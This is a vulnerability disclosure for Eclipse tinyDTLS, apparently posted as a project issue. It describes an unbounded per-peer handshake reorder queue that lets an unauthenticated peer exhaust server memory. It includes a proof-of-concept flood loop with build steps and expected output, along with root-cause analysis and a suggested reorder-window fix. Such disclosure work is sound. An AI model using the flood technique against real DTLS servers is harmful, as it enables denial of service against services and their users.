tinydtls Unbounded Handshake Reorder Queue DoS #273

@Zhaodl1

1. Report Metadata

Project: Eclipse tinyDTLS
Title: Unbounded per-peer handshake reorder queue enables remote memory-exhaustion DoS
Affected component: dtls.c, netq.c
Affected function: handle_handshake() (reorder buffering branch)
Affected role: DTLS server (posix/malloc builds)
Tested version: v0.9-rc1-214-g6f4f604 (commit 6f4f604, main)
Suggested CWE: CWE-400 (Uncontrolled Resource Consumption), CWE-770 (Allocation of Resources Without Limits)
Impact class: Remote Denial of Service (memory exhaustion)

2. Executive Summary

Eclipse tinyDTLS maintains a per-peer reorder queue for out-of-order
DTLS handshake messages. When a handshake message arrives with a
message sequence number (mseq) greater than the expected next
sequence (mseq_r), the library allocates a new queue node via
malloc() and copies the entire message into it, intending to replay
it once the gap is filled.

There is no limit on the number of queued nodes on posix/malloc
builds. The source code contains a literal /* TODO: only add packet that are not too new. */ comment at the allocation site,
acknowledging that the bound is missing.

A remote, unauthenticated attacker who can reach the DTLS server can
send a flood of handshake messages with distinct mseq values (1
through 65535). Each message causes a malloc of up to
sizeof(netq_t) + DTLS_MAX_BUF bytes (~1448 bytes on 64-bit posix;
~1348 bytes with the 1300-byte bodies used in the PoC). At ~1348
bytes per node, the 65535 distinct mseq values let a single peer
force the server to allocate approximately 84 MB of queue memory.
An attacker who creates many peers, each after its own cookie
exchange, can exhaust all available server memory, crashing the
process or denying service to legitimate clients.

Contiki and RIOT builds are not affected because they use a
fixed-size memory pool (NETQ_MAXCNT = 3 for PSK, 5 for ECC) that
caps the queue length.

3. Vulnerability Overview

The vulnerable code is in handle_handshake(), in the branch that
handles out-of-order messages:

@tinydtls/dtls.c:4362-4405

  uint16_t mseq = dtls_uint16_to_int(hs_header->message_seq);
  if (mseq < peer->handshake_params->hs_state.mseq_r) {
    dtls_warn("The message sequence number is too small, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);
    return 0;
  } else if (mseq > peer->handshake_params->hs_state.mseq_r) {
    /* A packet in between is missing, buffer this packet. */
    netq_t *n;

    dtls_info("The message sequence number is too larger, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);

    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    netq_t *node = netq_head(&peer->handshake_params->reorder_queue);
    while (node) {
      dtls_handshake_header_t *node_header = DTLS_HANDSHAKE_HEADER(node->data);
      if (dtls_uint16_to_int(node_header->message_seq) == mseq) {
        dtls_warn("a packet with this sequence number is already stored\n");
        return 0;
      }
      node = netq_next(node);
    }

    n = netq_node_new(data_length);
    if (!n) {
      dtls_warn("no space in reorder buffer\n");
      return 0;
    }

    n->peer = peer;
    n->length = data_length;
    memcpy(n->data, data, data_length);

    if (!netq_insert_node(&peer->handshake_params->reorder_queue, n)) {
      dtls_warn("cannot add packet to reorder buffer\n");
      netq_node_free(n);
    }
    dtls_info("Added packet %u for reordering\n", mseq);
    return 0;
  }

The flawed design is the absence of any cap on the number of nodes
in peer->handshake_params->reorder_queue. The only checks are:

  1. data_length <= DTLS_MAX_BUF (line 4375) — limits node size,
    not node count.
  2. A dedup scan (lines 4380-4388) — prevents the same mseq from
    being queued twice, but does not limit distinct mseq values.

The TODO comment at line 4374 explicitly acknowledges that packets
with "too new" mseq values should be rejected, but this was never
implemented.

The underlying allocator on posix is unbounded:

@tinydtls/netq.c:38-41

static inline netq_t *
netq_malloc_node(size_t size) {
  return (netq_t *)malloc(sizeof(netq_t) + size);
}

4. Technical Root Cause

Reachability

The reorder queue is reachable from dtls_handle_message() via the
normal handshake dispatch path:

  1. dtls_handle_message() at @tinydtls/dtls.c:4627
    iterates over DTLS records.
  2. For a known peer with valid security parameters, the record is
    passed to decrypt_verify() and, if it decrypts, dispatched by
    content type.
  3. DTLS_CT_HANDSHAKE records go to handle_handshake() at
    @tinydtls/dtls.c:4777.
  4. handle_handshake() validates the handshake header
    (fragment_length + DTLS_HS_LENGTH == data_length) and then
    checks mseq against mseq_r.

Pre-authentication reachability

On the server side, the reorder path is reachable as soon as a
peer exists with handshake_params allocated. This happens after
the cookie exchange completes (handle_0_verified_client_hello()
creates handshake_params at @tinydtls/dtls.c:4238).
At that point mseq_r = 0, so any handshake message with
mseq >= 1 takes the mseq > mseq_r branch and is queued.

The attacker does not need to complete the handshake — only the
cookie exchange (one round trip). After that, the attacker can flood
thousands of out-of-order messages without ever sending the expected
mseq = 0 message.

Why the queue grows without bound

The mseq field is a 16-bit unsigned integer (uint16_t), so there
are 65536 possible values. The dedup scan only rejects exact
duplicates; it does not reject "too new" values. The TODO comment
at line 4374 was meant to add a check like
mseq - mseq_r < MAX_REORDER_WINDOW, but this was never implemented.
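
A minimal sketch of the kind of check the TODO appears to call for, written as a standalone predicate so the boundary cases are easy to see. The helper name reorder_window_accepts() and the value 16 for MAX_REORDER_WINDOW are assumptions made for illustration; neither exists in tinyDTLS. The comparison accepts a distance of exactly MAX_REORDER_WINDOW, matching the `>` rejection test in the suggested fix in section 8.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical constant, not defined by tinyDTLS. */
#define MAX_REORDER_WINDOW 16

/*
 * Returns true when a handshake message with sequence number `mseq` is
 * ahead of the expected `mseq_r` by at most `window` and may be buffered.
 * In-order (mseq == mseq_r) and old (mseq < mseq_r) messages are not
 * candidates for buffering, so they return false here.
 */
static bool
reorder_window_accepts(uint16_t mseq, uint16_t mseq_r, uint16_t window) {
  assert(window > 0);
  if (mseq <= mseq_r) {
    return false;
  }
  /* mseq > mseq_r here, so the difference cannot wrap. */
  uint16_t distance = (uint16_t)(mseq - mseq_r);
  return distance <= window;
}
```

With mseq_r = 0 this accepts mseq 1 through 16 and rejects 17 and above, so at most 16 distinct nodes could ever be queued for a peer.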

Memory per node

Each queued node is sizeof(netq_t) + data_length bytes. On a
64-bit posix build, sizeof(netq_t) is approximately 48 bytes
(pointers, counters, length). With data_length up to
DTLS_MAX_BUF (1400 on posix), each node can be up to ~1448 bytes.
The PoC uses 1300-byte bodies, yielding ~1348 bytes per node.
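
The arithmetic behind these figures can be sketched as follows. The 48-byte header size is the approximation quoted above, not a measured sizeof(netq_t), and the helper names are hypothetical. The result counts bytes requested from malloc() only; allocator overhead and actual RSS will differ.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed values taken from the figures quoted in this report. */
#define ASSUMED_NETQ_HEADER_BYTES 48u    /* approximate sizeof(netq_t) */
#define MAX_DISTINCT_MSEQ         65535u /* mseq 1..65535 with mseq_r = 0 */

/* Bytes requested from malloc() for one queued node. */
static uint64_t
node_bytes(uint64_t data_length) {
  return ASSUMED_NETQ_HEADER_BYTES + data_length;
}

/* Bytes requested for `nodes` queued messages of equal size. */
static uint64_t
queue_bytes(uint64_t nodes, uint64_t data_length) {
  assert(nodes <= MAX_DISTINCT_MSEQ);
  return nodes * node_bytes(data_length);
}
```

Under these assumptions queue_bytes(65535, 1300) is 88,341,180 bytes (about 84 MiB, the per-peer figure used in this report), and queue_bytes(65535, 1400) is 94,894,680 bytes (about 90 MiB).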

Platform dependence

  • posix/malloc (!(WITH_CONTIKI) && !(RIOT_VERSION)): unbounded
    malloc, vulnerable.
  • Contiki: MEMB(netq_storage, netq_t, NETQ_MAXCNT) with
    NETQ_MAXCNT = 3 (PSK) or 5 (ECC), not vulnerable (pool
    capped).
  • RIOT: memarray with NETQ_MAXCNT entries, not vulnerable
    (pool capped).
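
To illustrate why a fixed-size pool caps the queue, here is a simplified stand-in for a pool allocator. It is not the Contiki MEMB or RIOT memarray implementation; the type fixed_pool_t, the functions pool_alloc() and pool_free(), and the 64-byte slot size are all hypothetical. POOL_SLOTS is set to 3 to mirror the NETQ_MAXCNT value quoted for PSK builds.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical sizes; POOL_SLOTS mirrors NETQ_MAXCNT = 3 (PSK). */
#define POOL_SLOTS 3
#define SLOT_BYTES 64

typedef struct {
  bool in_use[POOL_SLOTS];
  unsigned char storage[POOL_SLOTS][SLOT_BYTES];
} fixed_pool_t;

/* Returns a free slot, or NULL once all POOL_SLOTS are taken. */
static void *
pool_alloc(fixed_pool_t *pool) {
  assert(pool != NULL);
  for (size_t i = 0; i < POOL_SLOTS; i++) {
    if (!pool->in_use[i]) {
      pool->in_use[i] = true;
      return pool->storage[i];
    }
  }
  return NULL;
}

/* Marks the slot at `ptr` as free; returns false if `ptr` is not a used slot. */
static bool
pool_free(fixed_pool_t *pool, void *ptr) {
  assert(pool != NULL);
  for (size_t i = 0; i < POOL_SLOTS; i++) {
    if (ptr == (void *)pool->storage[i] && pool->in_use[i]) {
      pool->in_use[i] = false;
      return true;
    }
  }
  return false;
}
```

Once the three slots are handed out, pool_alloc() returns NULL, which corresponds to the "no space in reorder buffer" branch in handle_handshake(): further out-of-order messages are dropped instead of growing the heap.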

5. Proof of Concept

The PoC (poc.c) #includes dtls.c to access the static
handle_handshake() path and the peer's reorder_queue. It:

  1. Creates a DTLS context and a peer in
    DTLS_STATE_WAIT_CLIENTKEYEXCHANGE with handshake_params
    allocated and mseq_r = 0 (simulating the post-cookie state).
  2. Sends 2000 epoch-0 handshake records, each with a distinct record
    sequence number and a distinct handshake mseq (1 through 2000),
    each carrying a 1300-byte body.
  3. Counts the resulting reorder queue length and measures RSS growth.

The flood loop:

for (int i = 0; i < NUM_FLOOD_MESSAGES; i++) {
    uint16_t mseq = (uint16_t)(i + 1);   /* 1..2000, all > mseq_r=0 */
    uint64_t rseq = (uint64_t)(i + 1);

    uint8 *p = pkt;
    p = put_record_header(p, DTLS_CT_HANDSHAKE, 0, rseq, fraglen);
    p = put_handshake_header(p, DTLS_HT_CLIENT_KEY_EXCHANGE,
                             BODY_SIZE, mseq, 0, BODY_SIZE);
    memset(p, 0x41, BODY_SIZE);
    p += BODY_SIZE;

    size_t pktlen = (size_t)(p - pkt);
    dtls_handle_message(ctx, &sess, pkt, (int)pktlen);
}

Every message takes the mseq > mseq_r branch and is queued.
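
The bodies of put_record_header() and put_handshake_header() are not shown in this report. The following sketch shows how such helpers could encode the DTLS 1.2 record header (13 bytes) and handshake header (12 bytes) in network byte order. The sketch_ names and put_be() are hypothetical, and the PoC's actual helpers may differ.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SKETCH_RECORD_HEADER_LEN    13
#define SKETCH_HANDSHAKE_HEADER_LEN 12

/* Writes the low `nbytes` bytes of `value` in big-endian order. */
static uint8_t *
put_be(uint8_t *p, uint64_t value, size_t nbytes) {
  assert(nbytes >= 1 && nbytes <= 8);
  for (size_t i = 0; i < nbytes; i++) {
    p[i] = (uint8_t)(value >> (8 * (nbytes - 1 - i)));
  }
  return p + nbytes;
}

/* Record header: type, version, epoch, 48-bit sequence number, length. */
static uint8_t *
sketch_put_record_header(uint8_t *p, uint8_t type, uint16_t epoch,
                         uint64_t rseq, uint16_t length) {
  p = put_be(p, type, 1);
  p = put_be(p, 0xFEFD, 2); /* DTLS 1.2 version bytes */
  p = put_be(p, epoch, 2);
  p = put_be(p, rseq, 6);
  return put_be(p, length, 2);
}

/* Handshake header: type, 24-bit length, message_seq,
 * 24-bit fragment offset, 24-bit fragment length. */
static uint8_t *
sketch_put_handshake_header(uint8_t *p, uint8_t msg_type, uint32_t length,
                            uint16_t mseq, uint32_t frag_offset,
                            uint32_t frag_length) {
  p = put_be(p, msg_type, 1);
  p = put_be(p, length, 3);
  p = put_be(p, mseq, 2);
  p = put_be(p, frag_offset, 3);
  return put_be(p, frag_length, 3);
}
```

For an unfragmented message with a 1300-byte body, the record length field would be 12 + 1300 = 1312, and the handshake length and fragment length would both be 1300, which satisfies the fragment_length + DTLS_HS_LENGTH == data_length check described in section 4.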

6. Build & Run

Working directory:
tinydtls/vuln_002_reorder_queue_dos/

cmake -B build -S .
cmake --build build -j$(nproc)
./build/vuln_poc_reorder_queue_dos

Expected output:

tinydtls PoC -- Finding 2: unbounded reorder queue DoS
=============================================================
DTLS_MAX_BUF = 1400
Flood count  = 2000 (distinct mseq values)
Platform     = posix/malloc (unbounded; Contiki/RIOT capped at NETQ_MAXCNT)

RSS before flood: 3476 KB

--- Results ---
Messages sent:          2000
Reorder queue length:   2000 nodes
Dropped (errors):       0
RSS after flood:        4352 KB
RSS increase:           876 KB
Mem per queued node:    ~448 bytes

[!] Vulnerability reproduced: reorder queue grew to 2000 nodes
    with no bound.  An attacker can exhaust server memory by
    flooding distinct mseq values (up to 65535 per peer).
    CWE-400 (Resource Exhaustion).

    Worst case per peer: 65535 nodes x ~1348 bytes = ~84 MB

Done.

Exit code: 0 (the PoC demonstrates memory growth, not a crash).

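The queue grew to 2000 nodes with zero drops, consuming ~876 KB of
additional RSS (~448 bytes per node as measured). That is below the
nominal ~1348-byte allocation per node, so the ~84 MB per-peer
figure (65535 × ~1348 bytes) is an estimate from requested
allocation size, not an extrapolation of the measured RSS. Scaling
the measured figure to 65535 nodes gives roughly 29 MB.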

7. Impact

Attacker position: A remote, unauthenticated UDP peer who can
reach the DTLS server. On the server side, the attacker must first
complete a cookie exchange (one round trip) to create a peer with
handshake_params, then flood out-of-order handshake messages.

Denial of Service:

  • Per-peer memory exhaustion: A single attacker can force the
    server to allocate ~84 MB per peer by flooding all 65535 distinct
    mseq values with 1300-byte bodies (slightly more with
    DTLS_MAX_BUF-sized messages).
  • Multi-peer amplification: By using many source addresses or
    ports, the attacker can create many peers. Each requires its own
    cookie exchange, which is cheap but means the attacker must be
    able to receive the server's reply at that address, so blindly
    spoofed addresses are not sufficient. Each peer can independently
    accumulate up to 84 MB of queue memory, so N peers × 84 MB can
    exhaust the RAM of a typical server.
  • No legitimate traffic required: The attacker never sends the
    expected mseq = 0 message, so the queue is never drained. The
    memory persists until the peer times out and is destroyed.

CWE-400 (Uncontrolled Resource Consumption) / CWE-770
(Allocation of Resources Without Limits).

Severity: Medium. Requires cookie exchange (one round trip) but
no authentication. Impact is memory exhaustion leading to process
crash or degraded service. Contiki/RIOT builds are unaffected.

8. Remediation

Implement the TODO at @tinydtls/dtls.c:4374:
reject messages whose mseq is too far ahead of mseq_r.

Suggested fix — add a maximum reorder window check before the
allocation:

    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    /* NEW: cap the reorder window to prevent memory exhaustion. */
    #define DTLS_REORDER_WINDOW 16
    if (mseq - peer->handshake_params->hs_state.mseq_r > DTLS_REORDER_WINDOW) {
      dtls_warn("mseq %u too far ahead of expected %u, dropping\n",
                mseq, peer->handshake_params->hs_state.mseq_r);
      return 0;
    }

A window of 16 is generous for normal DTLS reordering (UDP rarely
delivers more than a few messages out of order) while bounding the
worst-case queue to 16 × ~1448 = ~23 KB per peer.

Additional hardening:

  • On posix builds, also enforce a maximum queue length (e.g. 32
    nodes) as a defense-in-depth measure, returning a fatal alert if
    exceeded.
  • Consider a global netq pool with a configurable cap even on
    posix, matching the Contiki/RIOT design.
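
As a sketch of the queue-length cap in the first bullet, the following counted queue refuses to grow past a fixed number of nodes. The types and functions (sketch_node_t, sketch_queue_t, sketch_queue_push(), sketch_queue_clear()) are hypothetical and deliberately simpler than netq: nodes are inserted at the head rather than in netq's order, and the cap of 32 is taken from the example value above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical cap, taken from the "e.g. 32 nodes" suggestion. */
#define SKETCH_MAX_QUEUE_LEN 32

typedef struct sketch_node {
  struct sketch_node *next;
  size_t length;
  unsigned char data[]; /* message bytes follow the header */
} sketch_node_t;

typedef struct {
  sketch_node_t *head;
  size_t count; /* number of nodes currently queued */
} sketch_queue_t;

/* Copies `data` into a new head node; refuses once the cap is reached. */
static bool
sketch_queue_push(sketch_queue_t *q, const void *data, size_t length) {
  assert(q != NULL && data != NULL);
  if (q->count >= SKETCH_MAX_QUEUE_LEN) {
    return false; /* cap reached: caller drops the packet */
  }
  sketch_node_t *n = malloc(sizeof(*n) + length);
  if (n == NULL) {
    return false;
  }
  n->length = length;
  memcpy(n->data, data, length);
  n->next = q->head;
  q->head = n;
  q->count++;
  return true;
}

/* Frees every node and resets the counter. */
static void
sketch_queue_clear(sketch_queue_t *q) {
  assert(q != NULL);
  while (q->head != NULL) {
    sketch_node_t *n = q->head;
    q->head = n->next;
    free(n);
  }
  q->count = 0;
}
```

Keeping the count alongside the head pointer makes the cap an O(1) check before malloc(), so a flood of distinct mseq values costs the server at most SKETCH_MAX_QUEUE_LEN allocations per peer. Any code path that removes a node must decrement the counter as well.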

9. References

vuln_002_reorder_queue_dos.zip
